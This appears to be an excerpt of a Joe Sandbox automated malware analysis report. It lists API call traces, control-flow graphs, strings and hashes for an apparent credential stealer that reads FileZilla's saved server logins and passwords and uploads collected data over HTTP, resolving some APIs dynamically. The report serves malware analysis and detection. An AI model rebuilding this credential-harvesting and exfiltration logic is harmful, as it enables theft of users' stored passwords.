                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystemwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2452939696-0
                                                                                                                                                                • Opcode ID: ee2d397246628077d00c16b0ca79215db3a5a111e065cfd3548694313971430e
                                                                                                                                                                • Instruction ID: 4f4ff272cdc2142c07cf4ca5f809034abbc4e654df17799356b8b655075a6e7a
                                                                                                                                                                • Opcode Fuzzy Hash: ee2d397246628077d00c16b0ca79215db3a5a111e065cfd3548694313971430e
                                                                                                                                                                • Instruction Fuzzy Hash: 02F0F6B1940218EFCB10DF84EC45FAEF7BCF744A10F004669F51592640D37529048BD0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 825 3010250-30102e2 call 301a740 call 3018de0 call 301a920 call 301a8a0 call 301a800 * 2 call 301a9b0 call 301a8a0 call 301a800 call 301a7a0 call 30099c0 847 30102e7-30102ec 825->847 848 30102f2-3010309 call 3018e30 847->848 849 3010726-3010739 call 301a800 call 3001550 847->849 848->849 855 301030f-301036f strtok_s call 301a740 * 4 GetProcessHeap RtlAllocateHeap 848->855 865 3010372-3010376 855->865 866 301068a-3010721 lstrlen call 301a7a0 call 3001590 call 3015190 call 301a800 memset call 301aa40 * 4 call 301a800 * 4 865->866 867 301037c-301038d StrStrA 865->867 866->849 868 30103c6-30103d7 StrStrA 867->868 869 301038f-30103c1 lstrlen call 30188e0 call 301a8a0 call 301a800 867->869 872 3010410-3010421 StrStrA 868->872 873 30103d9-301040b lstrlen call 30188e0 call 301a8a0 call 301a800 868->873 869->868 875 3010423-3010455 lstrlen call 30188e0 call 301a8a0 call 301a800 872->875 876 301045a-301046b StrStrA 872->876 873->872 875->876 882 3010471-30104c3 lstrlen call 30188e0 call 301a8a0 call 301a800 call 301aad0 call 3009ac0 876->882 883 30104f9-301050b call 301aad0 lstrlen 876->883 882->883 926 30104c5-30104f4 call 301a820 call 301a9b0 call 301a8a0 call 301a800 882->926 900 3010511-3010523 call 301aad0 lstrlen 883->900 901 301066f-3010685 strtok_s 883->901 900->901 911 3010529-301053b call 301aad0 lstrlen 900->911 901->865 911->901 921 3010541-3010553 call 301aad0 lstrlen 911->921 921->901 930 3010559-301066a lstrcat * 3 call 301aad0 lstrcat * 2 call 301aad0 lstrcat * 3 call 301aad0 lstrcat * 3 call 301aad0 lstrcat * 3 call 301a820 * 4 921->930 926->883 930->901
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 03018DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 030099EC
                                                                                                                                                                  • Part of subcall function 030099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03009A11
                                                                                                                                                                  • Part of subcall function 030099C0: LocalAlloc.KERNEL32(00000040,?), ref: 03009A31
                                                                                                                                                                  • Part of subcall function 030099C0: ReadFile.KERNEL32(000000FF,?,00000000,030102E7,00000000), ref: 03009A5A
                                                                                                                                                                  • Part of subcall function 030099C0: LocalFree.KERNEL32(030102E7), ref: 03009A90
                                                                                                                                                                  • Part of subcall function 030099C0: CloseHandle.KERNEL32(000000FF), ref: 03009A9A
                                                                                                                                                                  • Part of subcall function 03018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 03018E52
                                                                                                                                                                • strtok_s.MSVCRT ref: 0301031B
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F,03020DBA,03020DB7,03020DB6,03020DB3), ref: 03010362
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03010369
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 03010385
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03010393
                                                                                                                                                                  • Part of subcall function 030188E0: malloc.MSVCRT ref: 030188E8
                                                                                                                                                                  • Part of subcall function 030188E0: strncpy.MSVCRT ref: 03018903
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 030103CF
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 030103DD
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 03010419
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03010427
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 03010463
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03010475
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,03020DB2), ref: 03010502
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0301051A
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 03010532
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0301054A
                                                                                                                                                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 03010562
                                                                                                                                                                • lstrcat.KERNEL32(?,profile: null), ref: 03010571
                                                                                                                                                                • lstrcat.KERNEL32(?,url: ), ref: 03010580
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03010593
                                                                                                                                                                • lstrcat.KERNEL32(?,03021678), ref: 030105A2
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 030105B5
                                                                                                                                                                • lstrcat.KERNEL32(?,0302167C), ref: 030105C4
                                                                                                                                                                • lstrcat.KERNEL32(?,login: ), ref: 030105D3
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 030105E6
                                                                                                                                                                • lstrcat.KERNEL32(?,03021688), ref: 030105F5
                                                                                                                                                                • lstrcat.KERNEL32(?,password: ), ref: 03010604
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03010617
                                                                                                                                                                • lstrcat.KERNEL32(?,03021698), ref: 03010626
                                                                                                                                                                • lstrcat.KERNEL32(?,0302169C), ref: 03010635
                                                                                                                                                                • strtok_s.MSVCRT ref: 03010679
                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,03020DB2), ref: 0301068E
                                                                                                                                                                • memset.MSVCRT ref: 030106DD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                • API String ID: 3689735781-555421843
                                                                                                                                                                • Opcode ID: 30818e637d3979d285c1f848fc1ead1f803e87dbaf05661e3154c7974fa4c6aa
                                                                                                                                                                • Instruction ID: 0f02f9d7453abcf381e95eb025e08f7849b88d0e21caffa312b3f925365acbfb
                                                                                                                                                                • Opcode Fuzzy Hash: 30818e637d3979d285c1f848fc1ead1f803e87dbaf05661e3154c7974fa4c6aa
                                                                                                                                                                • Instruction Fuzzy Hash: 4DD13279A42208ABDB04FBF4DD99EEE7778FF54310F548418F102AA184DF74AA56CB60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03543038), ref: 030198A1
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03543050), ref: 030198BA
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03543068), ref: 030198D2
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03543080), ref: 030198EA
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03543098), ref: 03019903
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035430B0), ref: 0301991B
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03544358), ref: 03019933
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03544378), ref: 0301994C
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03544398), ref: 03019964
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035443B0), ref: 0301997C
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035443C8), ref: 03019995
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035404B0), ref: 030199AD
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035404C8), ref: 030199C5
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03547338), ref: 030199DE
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03547398), ref: 030199F6
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035404E8), ref: 03019A0E
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03547458), ref: 03019A27
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035474A0), ref: 03019A3F
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03540508), ref: 03019A57
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03547470), ref: 03019A70
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03540528), ref: 03019A88
                                                                                                                                                                • LoadLibraryA.KERNEL32(035473F8,?,03016A00), ref: 03019A9A
                                                                                                                                                                • LoadLibraryA.KERNEL32(035473B0,?,03016A00), ref: 03019AAB
                                                                                                                                                                • LoadLibraryA.KERNEL32(035473C8,?,03016A00), ref: 03019ABD
                                                                                                                                                                • LoadLibraryA.KERNEL32(03547488,?,03016A00), ref: 03019ACF
                                                                                                                                                                • LoadLibraryA.KERNEL32(03547368,?,03016A00), ref: 03019AE0
                                                                                                                                                                • GetProcAddress.KERNEL32(75670000,035473E0), ref: 03019B02
                                                                                                                                                                • GetProcAddress.KERNEL32(75750000,035474B8), ref: 03019B23
                                                                                                                                                                • GetProcAddress.KERNEL32(75750000,03547500), ref: 03019B3B
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03547380), ref: 03019B5D
                                                                                                                                                                • GetProcAddress.KERNEL32(759D0000,03540548), ref: 03019B7E
                                                                                                                                                                • GetProcAddress.KERNEL32(773F0000,03540568), ref: 03019B9F
                                                                                                                                                                • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 03019BB6
                                                                                                                                                                Strings
                                                                                                                                                                • NtQueryInformationProcess, xrefs: 03019BAA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                • String ID: NtQueryInformationProcess
                                                                                                                                                                • API String ID: 2238633743-2781105232
                                                                                                                                                                • Opcode ID: 9e07d61c7e70f4f4af2ec2c2ea1b36cb5d4bbc755d5708e9f1769f98ad0bfdf8
                                                                                                                                                                • Instruction ID: b3777c8c20aa6326018a03b228bb1e06e5f13f5b3c2e82f8e631730eea2eb448
                                                                                                                                                                • Opcode Fuzzy Hash: 9e07d61c7e70f4f4af2ec2c2ea1b36cb5d4bbc755d5708e9f1769f98ad0bfdf8
                                                                                                                                                                • Instruction Fuzzy Hash: 93A11ABE5C52409FE364FFA8FA9CA6A3BF9F748701704C51AE60A8724CD7399441DB50

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1064 3005100-300522d call 301a7a0 call 30047b0 call 3018ea0 call 301aad0 lstrlen call 301aad0 call 3018ea0 call 301a740 * 5 InternetOpenA StrCmpCA 1087 3005236-300523a 1064->1087 1088 300522f 1064->1088 1089 3005240-3005353 call 3018b60 call 301a920 call 301a8a0 call 301a800 * 2 call 301a9b0 call 301a920 call 301a9b0 call 301a8a0 call 301a800 * 3 call 301a9b0 call 301a920 call 301a8a0 call 301a800 * 2 InternetConnectA 1087->1089 1090 30058c4-3005959 InternetCloseHandle call 3018990 * 2 call 301aa40 * 4 call 301a7a0 call 301a800 * 5 call 3001550 call 301a800 1087->1090 1088->1087 1089->1090 1153 3005359-3005367 1089->1153 1154 3005375 1153->1154 1155 3005369-3005373 1153->1155 1156 300537f-30053b1 HttpOpenRequestA 1154->1156 1155->1156 1157 30058b7-30058be InternetCloseHandle 1156->1157 1158 30053b7-3005831 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a920 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301a9b0 call 301a8a0 call 301a800 call 301aad0 lstrlen call 301aad0 lstrlen GetProcessHeap RtlAllocateHeap call 301aad0 lstrlen call 301aad0 memcpy call 301aad0 lstrlen memcpy call 301aad0 lstrlen call 301aad0 * 2 lstrlen memcpy call 301aad0 lstrlen call 301aad0 HttpSendRequestA call 3018990 1156->1158 1157->1090 1312 3005836-3005860 InternetReadFile 1158->1312 1313 3005862-3005869 1312->1313 1314 300586b-30058b1 InternetCloseHandle 1312->1314 1313->1314 1315 300586d-30058ab call 301a9b0 call 301a8a0 call 301a800 1313->1315 1314->1157 1315->1312
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 030047EA
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004801
                                                                                                                                                                  • Part of subcall function 030047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03004818
                                                                                                                                                                  • Part of subcall function 030047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03004839
                                                                                                                                                                  • Part of subcall function 030047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 03004849
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03005193
                                                                                                                                                                  • Part of subcall function 03018EA0: CryptBinaryToStringA.CRYPT32(00000000,03005184,40000001,00000000,00000000,?,03005184), ref: 03018EC0
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 03005207
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,03554CA0), ref: 03005225
                                                                                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03005340
                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,03554DB0,?,03556390,00000000,00000000,00400100,00000000), ref: 030053A4
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,03554CC0,00000000,?,03549940,00000000,?,030219DC,00000000,?,030151CF), ref: 03005737
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300574B
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0300575C
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03005763
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 03005778
                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000), ref: 0300578F
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 030057A9
                                                                                                                                                                • memcpy.MSVCRT(?), ref: 030057B6
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 030057C8
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 030057E1
                                                                                                                                                                • memcpy.MSVCRT(?), ref: 030057F1
                                                                                                                                                                • lstrlen.KERNEL32(00000000,?,?), ref: 0300580E
                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 03005822
                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0300584D
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 030058B1
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 030058BE
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 030058C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                • String ID: ------$"$"$"$--$------$------$------
                                                                                                                                                                • API String ID: 2335077847-2774362122
                                                                                                                                                                • Opcode ID: 87e8beaf43253d36d86fa3a139a00b0f62128edf57659cf6d1775778c5a6c797
                                                                                                                                                                • Instruction ID: 3372905a1ab083412279f0af3500dd7b5d33bbc6ed597d96ce56157c2eb5f082
                                                                                                                                                                • Opcode Fuzzy Hash: 87e8beaf43253d36d86fa3a139a00b0f62128edf57659cf6d1775778c5a6c797
                                                                                                                                                                • Instruction Fuzzy Hash: EE321175A23218ABDB14FBA0DD94FEEB378BF94610F404159F1066B091EF706A5ACF60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
